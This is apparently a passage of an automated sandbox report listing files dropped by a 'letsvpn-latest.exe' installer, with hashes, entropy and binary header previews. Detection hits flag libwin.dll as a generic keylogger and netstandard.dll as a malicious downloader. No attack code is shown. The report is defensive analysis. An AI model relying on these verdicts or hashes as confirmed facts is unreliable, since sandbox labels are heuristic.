                                                                                                                                                                                                  Entropy (8bit):6.791970793161073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LsxhehdMDxbFWe6lW5hqWOHlLf2KQcvBZ9XKiNS+ShjmM6IGBkS4:4vy+DA4q3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:63C242659089C61B00298F898CED5B2E
                                                                                                                                                                                                  SHA1:97104D6BAC9B264B9CEE15F2C4B82ABE80872192
                                                                                                                                                                                                  SHA-256:706ECAC3AB9529F2AA8782D9CDAC358225436850685F98FEA7B557A89941A86B
                                                                                                                                                                                                  SHA-512:A0E5D459839FD79E0E2CC58EB1B956D931503710DE3E0A733F6DD5E29787CFE9D6562FEB49421C220E0F5C013F028B9E88C61FBD837D91799B7C98992942E51E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,E..........." ..0..............9... ...@....... ....................................@.................................`9..O....@...............$.. ....`......D9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.755805881100906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:79WLKzFWe6lWUhqWOHlLf2KQcvBZ9lhbS+ShjmM6IGBkS8b:5gKz+rq3b2KZBZ1bS+ST6nkfb
                                                                                                                                                                                                  MD5:4E8BBD3CFDFF50E0E2A8F1CF7D7C0B1B
                                                                                                                                                                                                  SHA1:6C9BEEA42873A8367AA26CA6151176EEFFB69331
                                                                                                                                                                                                  SHA-256:850A6C7B1D216178671F60C56295CECE8B801F3801CD2670C0193E29DC9ED91B
                                                                                                                                                                                                  SHA-512:7D0722A6CBEA607B56C0FE5D11A31EC44314F3A694D1E45811C02EEF96D7151B700D202F39DD3DEE80BF4C2118AA8892F1464FAC74469855E70C34111E2BC7A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0..............9... ...@....... ..............................M%....@.................................09..O....@...............$.. ....`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................d9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.900258148465496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rNeZmFLRnyGO00Ik4oF3eUntWe6lWdhqWOHlLf2KQcvBZ9bxJS+ShjmM6IGBkS8:rQZmFLRnyGO00Ik4oF3eUnGYq3b2KZB+
                                                                                                                                                                                                  MD5:1CE86E199C50E28E4423BCDEC3B337C5
                                                                                                                                                                                                  SHA1:8EF284E87F8D9C1C0B78F826DBC42A381D753C73
                                                                                                                                                                                                  SHA-256:52D25AE7CF6ECC8746DDCFF279766A59162EE1A8D25FD7424E7A27E76EA9E7CA
                                                                                                                                                                                                  SHA-512:731C04BA44CEE917C3A255AD534C325D1511A1151CA4C304E18666AD28EA650A3A280A257E3E2C865D0F12A97AB5246500B8F97ED51E4A1A9121DDAEF38E9C94
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............2=... ...@....... ....................................@..................................<..O....@...............(.. ....`.......<............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......P ...............%..p...D<......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.9205398032930345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:xPP73AIGoWe6lWYhqWOHlLf2KQcvBZ9c2MS+ShjmM6IGBkSl:xX7AIGNTq3b2KZBZ9MS+ST6nkC
                                                                                                                                                                                                  MD5:B54150F34E9E5ED23D69BD822937A52B
                                                                                                                                                                                                  SHA1:E2FF594B6D9BE3A90725B1BA169A9027ECA33ABC
                                                                                                                                                                                                  SHA-256:3E866F4F1F18EF5CF7C9F6E4BBEF74ACD69120004A52778A8FD7CFC6E14066A4
                                                                                                                                                                                                  SHA-512:CED65F0CAED6DE841339140294D707FF49BA89199B7891A95A5CE7047F5203CAF570EF5831533C94073D3A190321B6BAB4A4085A1923F218843D674E8F147FC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9..........." ..0.............2;... ...@....... ...............................A....@..................................:..O....@...............&.. ....`.......:............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H.......P ...............%..p...D:......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10689056
                                                                                                                                                                                                  Entropy (8bit):6.3491186908804655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:GDzluVRWdkyvuIeBGrez6CYG7m68SxIc6b0tTziC002MZ:Mzln6aM1oC0JMZ
                                                                                                                                                                                                  MD5:ADABDAFF05BC4BA3CADF3A8F7248617F
                                                                                                                                                                                                  SHA1:0EEA8F9BE4CDF3D3933A35A2F2620C1E2AC57F4F
                                                                                                                                                                                                  SHA-256:75408CEC6E96255CDFA76163A26887E3DB726413CA5DF27A7331286282BB8450
                                                                                                                                                                                                  SHA-512:D792B6CBE8E29DC50FBC126C23535463E7F6E766DD7E9F5C6A63D476F7939DE8FC41EA17F8119858954638A591819F114794B6B26DBF240E408357A0D5D260B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...).*L.....<...........@L...8b................................T.....@... ...............................$.... ................. ....0..lM..................................................|..@............................text....)L......*L.................`..`.data...L....@L.......L.............@....rdata....N...O...N...O.............@..@.bss.....;...............................edata.............................@..@.idata..$..........................@....CRT....,...........................@....tls................................@....rsrc........ ......................@..@.reloc..lM...0...N..................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.config

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1510
                                                                                                                                                                                                  Entropy (8bit):5.153642637730153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JdGw/e40s+FpMU+nHnUn+OtxXqY9JXMi7c+nHQ7qY/DJYLLYi:3Gw/x0s6peHhOtRPJX3rHSF6Lsi
                                                                                                                                                                                                  MD5:7A7521BC7F838610905CE0286324CE39
                                                                                                                                                                                                  SHA1:8AB90DD0C4B6EDB79A6AF2233340D0F59E9AC195
                                                                                                                                                                                                  SHA-256:2A322178557C88CC3C608101E8FC84BFD2F8FA9B81483A443BB3D09779DE218D
                                                                                                                                                                                                  SHA-512:B25DFDCE0977EAF7159DF5EABE4B147A6C0ADAC39C84D1C7A9FE748446A10C8D2E20D04CF36221057AA210633DF65F2A460821C8C79A2DB16C912EC53A714D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<log4net>....<logger name="logger">.....<level value="ALL" />.....<appender-ref ref="LogAppender" />....</logger>....<appender name="LogAppender" type="log4net.Appender.RollingFileAppender">.....<param name="File" value="Log\\" />.....<param name="AppendToFile" value="true" />.....<param name="MaxFileSize" value="10240" />.....<param name="MaxSizeRollBackups" value="100" />.....<param name="StaticLogFileName" value="false" />.....<param name="DatePattern" value="yyyyMMdd&quot;.log&quot;" />.....<param name="RollingStyle" value="Date" />.....<layout type="log4net.Layout.PatternLayout">......<param name="ConversionPattern" value="%d [Level: %-5p] [Thread: %t] [class.%c] [%x]: %m%n" />.....</layout>....</appender>....<appender name="TextAppender" type="log4net.Appender.RollingFileAppender">.....<param name="AppendToFile" value="true" />.....<param name="RollingStyle" value="Date" />.....<param name="DatePattern" value="&quot;

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):282144
                                                                                                                                                                                                  Entropy (8bit):5.7076450783689925
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCT:CJrycoB3HVeESME3pnaVTS1nh7hCa9A
                                                                                                                                                                                                  MD5:C5098FF401B766E6E554499D37D0B716
                                                                                                                                                                                                  SHA1:FD4C3DF050EC2B30740E2D62B27A9E375401F190
                                                                                                                                                                                                  SHA-256:B015C62C09B4033D0A4CAAE36F3A9804A8CEE2549145E199ADA5A9BF51095E0D
                                                                                                                                                                                                  SHA-512:04F3261ED8D59E5E8455D868CB7CEEF97466FB4FC57A98544024F53C4BA9D935E9441169F0705877CF3578F2EF4FC1B54921E9E15ECC70003C67452AE1393F01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`.......z....`.................................h...O.... ............... .. ....@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1109536
                                                                                                                                                                                                  Entropy (8bit):5.833531644079543
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:c1WtBetKEfrsial0WV1pqfy+Jp15yKn6Gg:vtBetKEfrsial0WV7215yKn6Gg
                                                                                                                                                                                                  MD5:9D0ED298898601B4BCE156C4B550FBAF
                                                                                                                                                                                                  SHA1:909623F8AE5CEA4527DC4E2C5D1D851F65702148
                                                                                                                                                                                                  SHA-256:491BD0614EBD705E0F7E1E085D30F201F4CD7AD2F886048BD597BFB46449A87C
                                                                                                                                                                                                  SHA-512:07D3B077AB08074EF9E5552180B73521C8E4FAD48A9AAAEED26BE9D1F0F7C8C88CEF211BD65DFF2FB9F8EE0093E40DEF34F6F714EBA562DF41FEB430D5E6B16F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..\...........!......... ......N.... ........@.. ....................................@.....................................W.......0............... ...........P................................................ ............... ..H............text...T.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):94240
                                                                                                                                                                                                  Entropy (8bit):5.545893753117987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:h2Ec05j4eAH64rh5fSt5T9nFcI94W83qKv/m+:wlK4eA7mDmW8j/N
                                                                                                                                                                                                  MD5:85898D7A2C1B25CDE3CCB2001B4AFAE4
                                                                                                                                                                                                  SHA1:232A32AED8550D07B36528053A59FD0F7E28C578
                                                                                                                                                                                                  SHA-256:DEB3D361EF42CAC93F602C17B7F3DF6E22CE79D10C111CDD7969BCCC3FDE5B40
                                                                                                                                                                                                  SHA-512:F697C0F5CFA384AC23EFDE1E0F5A2597E1415E3322B3C35983BA8A9A64CE016A241F1834CDC269CE41AB772E9FA227963BE388A6387F8056C451D8F5CF5A4E54
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ..............................N.....@..................................U..O....`..,............B.. ............................................................ ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.83528093665527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cOss4wvEmF+4wpwlU+nACUOWe6lWwhqWOHlLf2KQcvBZ9ehfS+ShjmM6IGBkSNdn:cO/PArPq3b2KZBZ6S+ST6nkmn
                                                                                                                                                                                                  MD5:AAEDCF923306F04A5261B75D28B71EA7
                                                                                                                                                                                                  SHA1:58BAB697D7E8E5D578E7CDFF2BDE1DA2CB6B427C
                                                                                                                                                                                                  SHA-256:B254C31C34E91F5FE596E0A7DF41A9EB7D03BFBA37F4A8DC8E978E2C6A55769C
                                                                                                                                                                                                  SHA-512:78D29A03E4EC28D431BB44200DD1CE70080F57D1EF0319A880CCAC890C18198418EFECD778C8E665344DEC83A44809B9AEB14981E2535FE1DDBDEBB21EF46149
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..............9... ...@....... ..............................<.....@.................................x9..O....@...............$.. ....`......\9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........].....].....]...A.]...^.].....]...*.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................Z.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.768445701848389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5qXQfVeSN32XFZWe6lWLMhqWOHlLf2KQcvBZ9Vd/VS+ShjmM6IGBkSHn:5g0VyiwEq3b2KZBZ1/VS+ST6nkMn
                                                                                                                                                                                                  MD5:ACF6193D5511378B7C02C03E00386CD1
                                                                                                                                                                                                  SHA1:7D9E11C2C99A4186E7EF5802BCED72315CAF162A
                                                                                                                                                                                                  SHA-256:1B728D394D07AB1CF12E5F70CD2FC558598F068057DF749980DFA02ACE97BFF7
                                                                                                                                                                                                  SHA-512:2C168D1F7F3B4EBC9FEE54689553858EFDBEEFC770F0B79F3F779951480E4CE64F1ADE20FE6C35708C4F555B8847F613BB6C3B15C577EA46AB72F08A5FFB294E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0.............V9... ...@....... ..............................LB....@..................................9..O....@...............$.. ....`.......8............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................89......H.......P ...............%......h8......................................BSJB............v4.0.30319......l...D...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................2.......................x...........`.....`.....`...G.`...d.`.....`...0.`.................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80928
                                                                                                                                                                                                  Entropy (8bit):5.896904626678757
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nGLNpA+N49BVKZUj7uecjqYGBzRuAN8J74zIg/m490sqXz2RgUWEw3qKm/mT:nG6DBduAN8J74zIg/m4HqXz2RgUWEwKw
                                                                                                                                                                                                  MD5:5CE4CBFEC968C625A856438C9E6FB160
                                                                                                                                                                                                  SHA1:9117A4411E22831E4363C92733AE84531FEE5D7C
                                                                                                                                                                                                  SHA-256:0D27592676D964F7F7AB27CA8DCACB7C5B5017A745C4749502BF2227E258859D
                                                                                                                                                                                                  SHA-512:A333D327FDD02BFA0C7EB4CA3A1602F3223ED292EBD5A085C40E6403DAE3DA329B0BA53DB6E7181E3436EB10C73FA247934067EA17025703406FA2773BD01A5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!.................$... ...@....... ....................................@..................................#..W....@..(............... ....`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B.................#......H........ ..$...........P ..=...........................................9..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.793372115427383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:i8knfHjuXOQWe6lWihqWOHlLf2KQcvBZ9SGES+ShjmM6IGBkSJO:PAuXO1lq3b2KZBZpES+ST6nkEO
                                                                                                                                                                                                  MD5:4178B66B86ED7539703EC80B6407F0F5
                                                                                                                                                                                                  SHA1:2B1088242E8C5169EB3CAD9399408990119B27D0
                                                                                                                                                                                                  SHA-256:6F015F7F2CCC29F50764D4482E6A3C91B9B4BA1346B76F64438AF0FC544C8D55
                                                                                                                                                                                                  SHA-512:BA87B81AFDAF53FE63C9161D075F5CE4F55C37A0AE967D492695B77E84E18D559B67063D73CD2922D4E1207078D8838A8AF9E424FC8859259A00CC64CCFFD2FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0.. ...........>... ...@....... ...................................@..................................>..O....@...............*.. ....`.......>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P ...............%..8....>......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) ARMv7 Thumb, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906272
                                                                                                                                                                                                  Entropy (8bit):7.132105604057801
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:soXErM5iD28EYQg502GXoU5C0ParRvbLk:tXriD28xj52X7arpk
                                                                                                                                                                                                  MD5:692EAC9101A2F178CCF4F3AC8D4E69A7
                                                                                                                                                                                                  SHA1:6E493B2436892DCCC591EE278B3426DB484DCF8D
                                                                                                                                                                                                  SHA-256:D2CC43A027D8AAA688D846665DF8E24F4D3AFAD8C51BC364C47D7FB8C3E596CD
                                                                                                                                                                                                  SHA-512:4E46AB74F40FB20A64535B97AB2473B8F5FFC91520B8B71A7CCC2F4754DD4A516A37C6E0009F8B9A10323445F8EAF2C042B58ED858B12C3769DA46850AB3D099
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`^ .$?N.$?N.$?N..WK..?N..WJ.*?N..WO.'?N.$?O..?N.%RK.9?N.%RJ.)?N.%RM.*?N..RJ.&?N..RN.%?N..R..%?N..RL.%?N.Rich$?N.........PE........^.........."!........................ .......................................J....@A............................"......(............@..hO...... ........?..0l..T............................l............... ...............................text............................... ..`.rdata..B.... ......................@..@.data...<J.......>..................@....pdata..hO...@...P..................@..@.rsrc................d..............@..@.reloc...?.......@...f..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1314848
                                                                                                                                                                                                  Entropy (8bit):6.548345207582786
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:UwDD7AuRNZxBNzFlbZcN16AL9hwYi20TAg7wkPxl:UIDbR1L/m9KYixcWH
                                                                                                                                                                                                  MD5:3FD1AFC37E19603D56A261E4AA8DE93B
                                                                                                                                                                                                  SHA1:AD3573E1D2DDECF1128ED06195B4BC0F3E2C1949
                                                                                                                                                                                                  SHA-256:6010694F42A708F29ADBDC9D9C9C7ADBA1E72827FAC30110591FDB238D16C837
                                                                                                                                                                                                  SHA-512:8DAE7E662234270B555FDCFB77043353441A122D640CCE9B62C310C577967438D47D4FD69BB48A03277313F0A98FC34322EF7082BF8C56CE0D5AD10D647E3E5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.[.~.5.~.5.~.5.%.1.u.5.%.6.v.5.%.0...5.%.4.}.5.~.4...5...0.`.5...1.p.5...6.v.5..1.|.5..5...5......5..7...5.Rich~.5.........PE..d.....^.........." ................P........................................P............`A........................................ ...."..(...(.... .......@..h....... ....0..........T............................................................................text............................... ..`.rdata..............................@..@.data....i.......T..................@....pdata..h....@......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1030176
                                                                                                                                                                                                  Entropy (8bit):6.751228097849462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:0BvdKGB6hOsMxCmy+rAnpyAqhTz3RzVNUOxKKoSk:0vdKGBmWNAnpc3Rz1KKoSk
                                                                                                                                                                                                  MD5:77EA9B2FD3A7D8787FB80B32F7162A4A
                                                                                                                                                                                                  SHA1:DAF5B3C6B2EDA96C86BE34B57E77D0021A51543D
                                                                                                                                                                                                  SHA-256:3E7F79471A84B3505B781DDA0BDD33A8F5AD5A18C232D724F7E477D92E252DCF
                                                                                                                                                                                                  SHA-512:B91A084B30ABA93F0F10D4165E654308842BCA4152D13B057025684B2BB2963F272473D5A3BE4E0C0A9A3B4C7A39E3876E87F99869AA09252E6E9E71E6CA0C6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
